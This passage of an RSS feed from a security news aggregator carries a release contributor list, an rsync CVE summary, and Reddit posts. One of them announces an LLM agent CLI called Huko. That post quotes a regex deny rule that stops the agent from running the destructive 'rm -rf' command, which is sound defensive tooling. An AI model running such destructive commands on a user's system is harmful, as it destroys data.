href="https://github.com/kallidean">@kallidean</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keyuyuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keyuyuan">@keyuyuan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kfa-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kfa-ai">@kfa-ai</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kidonng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kidonng">@kidonng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KiraKatana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KiraKatana">@KiraKatana</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kjames2001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kjames2001">@kjames2001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Korkyzer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Korkyzer">@Korkyzer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KvnGz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KvnGz">@KvnGz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lars-hagen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lars-hagen">@lars-hagen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leehack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leehack">@leehack</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leepoweii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leepoweii">@leepoweii</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/li0near/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/li0near">@li0near</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/libo1106/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/libo1106">@libo1106</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liquidchen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liquidchen">@liquidchen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/littlewwwhite/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/littlewwwhite">@littlewwwhite</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liyoungc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liyoungc">@liyoungc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luandiasrj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luandiasrj">@luandiasrj</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyuctl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyuctl">@luoyuctl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/magic524/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/magic524">@magic524</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbac/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbac">@mbac</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McClean/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McClean">@McClean</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/memosr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/memosr">@memosr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mibayy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mibayy">@Mibayy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ming1523/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ming1523">@ming1523</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mizgyo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mizgyo">@mizgyo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrshu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrshu">@mrshu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ms-alan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ms-alan">@ms-alan</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MustafaKara7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MustafaKara7">@MustafaKara7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nederev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nederev">@nederev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nicoechaniz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nicoechaniz">@nicoechaniz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nidhi-singh02/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nidhi-singh02">@nidhi-singh02</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nightcityblade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nightcityblade">@nightcityblade</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nik1t7n/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nik1t7n">@nik1t7n</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ninso112/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ninso112">@Ninso112</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NivOO5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NivOO5">@NivOO5</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novax635/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novax635">@novax635</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oferlaor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oferlaor">@oferlaor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oswaldb22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oswaldb22">@oswaldb22</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/outdoorsea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/outdoorsea">@outdoorsea</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oxngon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oxngon">@oxngon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PaTTeeL/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PaTTeeL">@PaTTeeL</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pearjelly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pearjelly">@pearjelly</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pefontana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pefontana">@pefontana</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/perng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/perng">@perng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PhilipAD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PhilipAD">@PhilipAD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phuongvm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phuongvm">@phuongvm</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/polkn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/polkn">@polkn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Prasanna28Devadiga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Prasanna28Devadiga">@Prasanna28Devadiga</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/princepal9120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/princepal9120">@princepal9120</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pty819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pty819">@pty819</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/purzbeats/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/purzbeats">@purzbeats</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Quarkex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Quarkex">@Quarkex</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quocanh261997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quocanh261997">@quocanh261997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qWaitCrypto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qWaitCrypto">@qWaitCrypto</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Qwinty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Qwinty">@Qwinty</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rahimsais/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rahimsais">@rahimsais</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raymaylee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raymaylee">@raymaylee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ReqX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ReqX">@ReqX</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RhombusMaximus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RhombusMaximus">@RhombusMaximus</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ruzzgar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ruzzgar">@Ruzzgar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryptotalent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryptotalent">@ryptotalent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shaun0927/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shaun0927">@shaun0927</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SiliconID/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SiliconID">@SiliconID</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silv-mt-holdings/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silv-mt-holdings">@silv-mt-holdings</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smwbev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smwbev">@smwbev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/soichiyo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/soichiyo">@soichiyo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/steezkelly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/steezkelly">@steezkelly</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sylw3ster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sylw3ster">@Sylw3ster</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szymonclawd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szymonclawd">@szymonclawd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teyrebaz33/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teyrebaz33">@teyrebaz33</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianyu199509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianyu199509">@Tianyu199509</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tranquil-Flow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tranquil-Flow">@Tranquil-Flow</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TreyDong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TreyDong">@TreyDong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurgutKural/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurgutKural">@TurgutKural</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tw2818/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tw2818">@tw2818</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tymrtn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tymrtn">@tymrtn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/uzunkuyruk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/uzunkuyruk">@uzunkuyruk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v1b3coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v1b3coder">@v1b3coder</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanthinh6886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanthinh6886">@vanthinh6886</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VinceZcrikl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VinceZcrikl">@VinceZcrikl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vKongv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vKongv">@vKongv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vominh1919/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vominh1919">@vominh1919</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voteblake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voteblake">@voteblake</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VTRiot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VTRiot">@VTRiot</a>, @wali-reheman, @wesleysimplicio,<br>
@wilsen0, @WorldWriter, @worlldz, @wuli666, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wuwuzhijing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wuwuzhijing">@wuwuzhijing</a>, @Wysie, @XiaoXiao0221, @xieNniu, @xxxigm, @yehuosi,<br>
@ygd58, @yifengingit, @yuga-hashimoto, @zccyman, @ZeterMordio, @Zhekinmaksim, @zhengyn0001</p>
<p>Also: @Nagatha (Claude Opus 4.7).</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.5.7...v2026.5.16">v2026.5.7...v2026.5.16</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3518803/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3518803/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-red-hat/</guid>
<pubDate>Fri, 15 May 2026 09:46:13 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[[OC] I was tired of AI tools breaking my terminal workflow, so I built a pipe-friendly CLI that acts like a standard Unix filter (with .git-like state isolation). It's brand new and I need your harsh feedback.]]></title>
<description><![CDATA[Hi, I know this sub is generally (and rightfully) exhausted by the endless wave of "AI wrappers" that try to take over your entire system, force you into clunky web UIs, or dump massive global configs in your home directory. I felt the same way. I wanted to use LLMs for daily dev tasks, but I did...]]></description>
<link>https://tsecurity.de/de/3515987/linux-tipps/oc-i-was-tired-of-ai-tools-breaking-my-terminal-workflow-so-i-built-a-pipe-friendly-cli-that-acts-like-a-standard-unix-filter-with-git-like-state-isolation-its-brand-new-and-i-need-your-harsh-feedback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515987/linux-tipps/oc-i-was-tired-of-ai-tools-breaking-my-terminal-workflow-so-i-built-a-pipe-friendly-cli-that-acts-like-a-standard-unix-filter-with-git-like-state-isolation-its-brand-new-and-i-need-your-harsh-feedback/</guid>
<pubDate>Thu, 14 May 2026 09:39:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi,</p> <p>I know this sub is generally (and rightfully) exhausted by the endless wave of "AI wrappers" that try to take over your entire system, force you into clunky web UIs, or dump massive global configs in your home directory.</p> <p>I felt the same way. I wanted to use LLMs for daily dev tasks, but I didn't want a heavy "co-pilot". I wanted a standard, dumb pipe that I could chain with <code>grep</code>, <code>awk</code>, and <code>jq</code>.</p> <p>So I built <strong>Huko</strong>.</p> <p>It’s an open-source CLI tool designed strictly around the Unix philosophy: do one thing, take <code>stdin</code>, and spit out <code>stdout</code> (or JSON).</p> <p>Here is what makes it fit for a proper Linux environment:</p> <ul> <li><strong>Pipes all the way down:</strong> It just reads and writes text. You can drop it into any bash script. <code>cat /var/log/syslog | grep "error" | huko -m -- "summarize the root cause" &gt; report.txt</code></li> <li><strong>State isolation via .huko/:</strong> Context bleed is terrible. Instead of a global daemon, Huko scopes its memory and sessions to the current working directory using a hidden <code>.huko/</code> folder (exactly like how <code>.git/</code> works). You <code>cd</code> in, it remembers the project context. You <code>cd</code> out, it's a clean slate.</li> <li><strong>Controlling the blast radius:</strong> Giving an LLM access to bash is a security nightmare. Huko has built-in regex gating (<code>huko safety deny bash 're:^rm -rf'</code>), scrubs secrets <em>before</em> they leave your machine, and can execute destructive commands inside an isolated Docker container (<code>huko docker run</code>).</li> <li><strong>Two Gears (Lean vs. Full) &amp; Algorithmic Compression:</strong> <ul> <li><strong>Lean Mode:</strong> For quick, one-off pipeline filtering, it runs with a tiny ~400 token overhead. Zero ceremony.</li> <li><strong>Full Mode:</strong> For complex, multi-step execution, it brings in robust task planning and full tool orchestration. To prevent massive context bloat during long sessions, it uses a <strong>pure-algorithmic compression strategy</strong> (inspired by Manus) to prune the context tree locally. No slow, expensive LLM summarization loops—just fast, zero-overhead algorithmic pruning.</li> <li><em>Proof of concept:</em> Full mode's planning is solid enough that a significant portion of Huko's own codebase was actually written, debugged, and refactored by Huko itself.</li> </ul></li> </ul> <p><strong>The Reality Check (Why I'm posting here):</strong></p> <p>Huko is a <strong>brand-new release (v0.x)</strong>.</p> <p>Even though it successfully bootstrapped part of its own codebase, let's be real: running in my solitary environment is different from surviving the wild. It has rough edges, the architecture might have blind spots I haven't considered, and there are almost certainly edge cases in local file handling or standard I/O streams that will break it.</p> <p>I'm posting here because I want raw, unfiltered feedback from Linux power users.</p> <ul> <li>Does this approach to state management actually make sense to you?</li> <li>Are there glaring security holes in how I handle regex gating?</li> <li>Tear the architecture apart.</li> </ul> <p>If this sounds mildly useful, I’d be honored if you tried to break it. Contributions, issues, or just telling me why this is a terrible idea are all highly welcomed.</p> <p><strong>Repo:</strong> <a href="https://github.com/alexzhaosheng/huko">https://github.com/alexzhaosheng/huko</a><br> <strong>Site:</strong> <a href="https://huko.dev/">https://huko.dev</a> (It’s just NPM install and go).</p> <p>Thanks for your time.</p> <p>--------------------------------------</p> <p><strong>Edit: One quick clarification based on some early feedback —</strong></p> <p>I realized some might see this as "just another LLM CLI" (like Simon Willison's excellent <code>llm</code> tool). If you're looking for a quick way to prompt a model and log the response to SQLite, use <code>llm</code>.</p> <p><strong>Huko is a different beast: it’s a full-blown Agent Runtime.</strong></p> <p>The difference isn't just "features," it's the <strong>loop</strong>. In a standard CLI wrapper, <em>you</em> are the loop—you decide what to ask next. In Huko, the <strong>Agent is the loop</strong>. You give it a high-level goal (e.g., <em>"Find the memory leak in this service and fix the test suite"</em>), and it manages the multi-turn execution autonomously. It decides which files to read, which tools to call, and when the task is actually finished. It doesn't just give you a response; it stays until the job is done.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/CatTwoYes"> /u/CatTwoYes </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tcnfx2/oc_i_was_tired_of_ai_tools_breaking_my_terminal/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tcnfx2/oc_i_was_tired_of_ai_tools_breaking_my_terminal/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[What's your favorite non-essential CLI tool/command?]]></title>
<description><![CDATA[I love using CLI tools like yazi (file mgr), rclone (cloud storage rsync), translate-shell (translator), lsd (better ls), nusgmon (data usage, i made that though), taskwarrior etc. it feels so nice and cool how awesome is CLI that can show almost anything just in texts. what's your favorite linux...]]></description>
<link>https://tsecurity.de/de/3515226/linux-tipps/whats-your-favorite-non-essential-cli-toolcommand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515226/linux-tipps/whats-your-favorite-non-essential-cli-toolcommand/</guid>
<pubDate>Thu, 14 May 2026 00:36:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I love using CLI tools like <code>yazi</code> (file mgr), <code>rclone</code> (cloud storage rsync), <code>translate-shell</code> (translator), <code>lsd</code> (better ls), <code>nusgmon</code> (data usage, i made that though), <code>taskwarrior</code> etc. it feels so nice and cool how awesome is CLI that can show almost anything just in texts. what's your favorite linux tools, wanna share?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Anonyboy26"> /u/Anonyboy26 </a> <br> <span><a href="https://i.redd.it/axixxgrybu0h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tbqe7l/whats_your_favorite_nonessential_cli_toolcommand/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2014-2855 | rsync up to 3.1.0 authenticate.c check_secret input validation (Nessus ID 75342 / ID 166967)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in rsync. This vulnerability affects the function check_secret of the file authenticate.c. Such manipulation leads to improper input validation.

This vulnerability is documented as CVE-2014-2855. The attack can be executed remotely. There is ...]]></description>
<link>https://tsecurity.de/de/3508249/sicherheitsluecken/cve-2014-2855-rsync-up-to-310-authenticatec-checksecret-input-validation-nessus-id-75342-id-166967/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508249/sicherheitsluecken/cve-2014-2855-rsync-up-to-310-authenticatec-checksecret-input-validation-nessus-id-75342-id-166967/</guid>
<pubDate>Mon, 11 May 2026 21:40:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/rsync">rsync</a>. This vulnerability affects the function <code>check_secret</code> of the file <em>authenticate.c</em>. Such manipulation leads to improper input validation.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2014-2855">CVE-2014-2855</a>. The attack can be executed remotely. There is not any exploit available.

Applying a patch is advised to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Building cryptographic agility into Sigstore]]></title>
<description><![CDATA[Software signatures carry an invisible expiration date. The container image or firmware you sign today might be deployed for 20 years, but the cryptographic signature protecting it may become untrustworthy within 10 years. SHA-1 certificates become worthless, weak RSA keys are banned, and quantum...]]></description>
<link>https://tsecurity.de/de/3501441/it-security-nachrichten/building-cryptographic-agility-into-sigstore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501441/it-security-nachrichten/building-cryptographic-agility-into-sigstore/</guid>
